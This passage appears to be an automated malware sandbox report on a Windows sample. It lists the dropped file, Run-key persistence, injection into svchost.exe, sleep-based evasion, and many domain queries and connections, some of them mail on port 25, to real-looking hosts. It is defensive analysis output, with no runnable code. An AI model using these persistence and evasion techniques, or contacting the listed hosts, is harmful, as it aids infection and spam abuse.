                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: 6gjnnBAbpc.exeStatic PE information: More than 1099 > 100 exports found
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_00412210 push ebx; mov dword ptr [esp], esi0_2_004122B4
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_004123F0 push eax; mov dword ptr [esp], edi0_2_004125EF
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00412210 push ebx; mov dword ptr [esp], esi1_2_004122B4
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_004123F0 push eax; mov dword ptr [esp], edi1_2_004125EF
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_10001030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,0_2_10001030

                      Persistence and Installation Behavior

                      barindex
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.24c1e88.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.6gjnnBAbpc.exe.10004088.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.10004088.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.f11e88.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.10004088.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.24e0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.24c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.f11e88.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.f30000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.10004088.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.6gjnnBAbpc.exe.2790000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.10004088.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.svchost.exe.4000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.svchost.exe.4000000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.svchost.exe.4000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.6gjnnBAbpc.exe.4000000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.6gjnnBAbpc.exe.2791e88.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.6gjnnBAbpc.exe.2791e88.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.f10000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.f10000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.6gjnnBAbpc.exe.10004088.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.24c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.6gjnnBAbpc.exe.2790000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.24c1e88.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.4000000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.svchost.exe.4000000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.671122999.0000000010004000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.642040224.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.642410962.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.669497358.0000000010004000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.651890416.0000000002790000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.670270360.0000000010004000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\svchost.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pigalicapiJump to behavior
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pigalicapiJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeStalling execution: Execution stalls by calling Sleepgraph_0-15980
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,0_2_04003B00
                      Source: C:\Users\user\pigalicapi.exeCode function: EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,1_2_024E3B00
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exe TID: 5896Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exe TID: 5996Thread sleep time: -21600000s >= -30000sJump to behavior
                      Source: C:\Users\user\pigalicapi.exe TID: 860Thread sleep time: -21600000s >= -30000sJump to behavior
                      Source: C:\Users\user\pigalicapi.exe TID: 5944Thread sleep time: -21600000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 5284Thread sleep count: 149 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 1784Thread sleep time: -145000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 6080Thread sleep count: 187 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 11600Thread sleep time: -85000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 4016Thread sleep count: 148 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 5268Thread sleep count: 33 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 4904Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 4988Thread sleep count: 1177 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 996Thread sleep count: 1207 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 5448Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 6200Thread sleep count: 1265 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 6208Thread sleep count: 1253 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 4736Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 6224Thread sleep count: 422 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 6232Thread sleep count: 469 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 5000Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 11576Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 13460Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 16444Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 16476Thread sleep count: 34 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 19096Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 23244Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 23300Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 5912Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 23752Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\pigalicapi.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_1-16631
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-16381
                      Source: C:\Users\user\pigalicapi.exeLast function: Thread delayed
                      Source: C:\Users\user\pigalicapi.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_04001CA0 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,Process32First,lstrlenA,lstrcpyA,OpenProcess,EnumProcessModules,K32EnumProcessModules,GetModuleFileNameExA,GetProcessImageFileNameA,K32GetProcessImageFileNameA,FindCloseChangeNotification,Process32Next,CloseHandle,0_2_04001CA0
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeThread delayed: delay time: 21600000Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeThread delayed: delay time: 21600000Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeThread delayed: delay time: 21600000Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 1177
                      Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 1207
                      Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 1265
                      Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 1253
                      Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 422
                      Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 469
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-16084
                      Source: C:\Users\user\pigalicapi.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-16336
                      Source: C:\Users\user\pigalicapi.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_1-16612
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-16362
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: GetAdaptersInfo,0_2_04009F70
                      Source: C:\Users\user\pigalicapi.exeCode function: GetAdaptersInfo,1_2_024E9F70
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_04008F80 GetVersionExA,GetSystemInfo,lstrcatA,lstrcatA,lstrcatA,GetSystemMetrics,lstrcatA,GetSystemMetrics,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,0_2_04008F80
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeThread delayed: delay time: 21600000Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeThread delayed: delay time: 21600000Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeThread delayed: delay time: 21600000Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeAPI call chain: ExitProcess graph end nodegraph_0-15949
                      Source: C:\Users\user\pigalicapi.exeAPI call chain: ExitProcess graph end nodegraph_1-16199
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.435643322.0000000008D20000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.536954407.0000000008D6A000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.306098000.0000000008D30000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.305232643.0000000008D6C000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.411734937.0000000008D61000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.411734937.0000000008D25000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.304691611.0000000008D6C000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D61000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D20000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_04001CA0 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,Process32First,lstrlenA,lstrcpyA,OpenProcess,EnumProcessModules,K32EnumProcessModules,GetModuleFileNameExA,GetProcessImageFileNameA,K32GetProcessImageFileNameA,FindCloseChangeNotification,Process32Next,CloseHandle,0_2_04001CA0
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_10001030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,0_2_10001030
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_040097A0 GetProcessHeap,RtlAllocateHeap,0_2_040097A0
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_04003090 mov eax, dword ptr fs:[00000030h]0_2_04003090
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_00E609FC mov eax, dword ptr fs:[00000030h]0_2_00E609FC
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_10001030 mov eax, dword ptr fs:[00000030h]0_2_10001030
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_024E3090 mov eax, dword ptr fs:[00000030h]1_2_024E3090
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00A209FC mov eax, dword ptr fs:[00000030h]1_2_00A209FC
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_10001030 mov eax, dword ptr fs:[00000030h]1_2_10001030
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_00401EBB LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,0_2_00401EBB
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_00401179 InterlockedCompareExchange,Sleep,Sleep,InterlockedCompareExchange,SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,InterlockedExchange,GetStartupInfoA,_initterm,exit,0_2_00401179
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_0040D4FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,0_2_0040D4FC
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_0040D500 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,0_2_0040D500
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_04003B00 EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,0_2_04003B00
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00401179 InterlockedCompareExchange,Sleep,Sleep,InterlockedCompareExchange,SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,InterlockedExchange,GetStartupInfoA,_initterm,exit,1_2_00401179
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_0040D4FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,1_2_0040D4FC
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_0040D500 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,1_2_0040D500
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_024E3B00 EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,1_2_024E3B00

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\svchost.exeJump to behavior
                      Source: C:\Users\user\pigalicapi.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: impexnc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: webways.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dayvo.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dataform.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shteeble.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.26.7.17 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kallman.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.69.139.150 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nt-hat.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 76.74.184.61 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gphpedit.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 107.180.58.31 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: avse.hu
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.210.102.34 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 194.143.194.23 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.189.171.125 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.229.22.126 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: notis.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nts-web.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: willsub.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.tyrns.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shesfit.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.65.224 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.74.161.133 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: multip.hu
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: tcpoa.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.248.169.48 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.194.202.26 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dog-jog.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 37.59.243.164 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kamptal.at
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.19.254.22 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bd-style.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.163.45.187 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.177.137.32 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: zupraha.cz
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.89.126 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.30.14 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: muhr-soehne.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.12.155.123 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.30.60.158 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: oaith.ca
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.180.178 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 88.86.118.82 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.99.226.184 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: aiolos-sa.gr
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: usadig.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.253.212.22 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.221.250.3 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gmail-smtp-in.l.google.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fdlymca.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: assideum.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.hyabmagneter.se
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bidroll.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: karmy.com.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vdoherty.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.230.63.186 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 51.159.3.117 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ncn.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: komie.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftmobile.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.124.76.247 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.111.4.72 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.71.13 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: onzcda.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sledsport.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: tbvlugus.nl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pellys.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.19.218.80 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.102.136.180 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: semuk.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: tozzhin.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.96.252.188 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: lyto.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.airmail.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.132.175.106 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: websy.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.164.117.233 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: 106west.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ruzee.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nblewis.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: amba-tc.si
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.185.159.144 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxs.mail.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: averwin.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 211.13.196.162 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 141.193.213.20 80
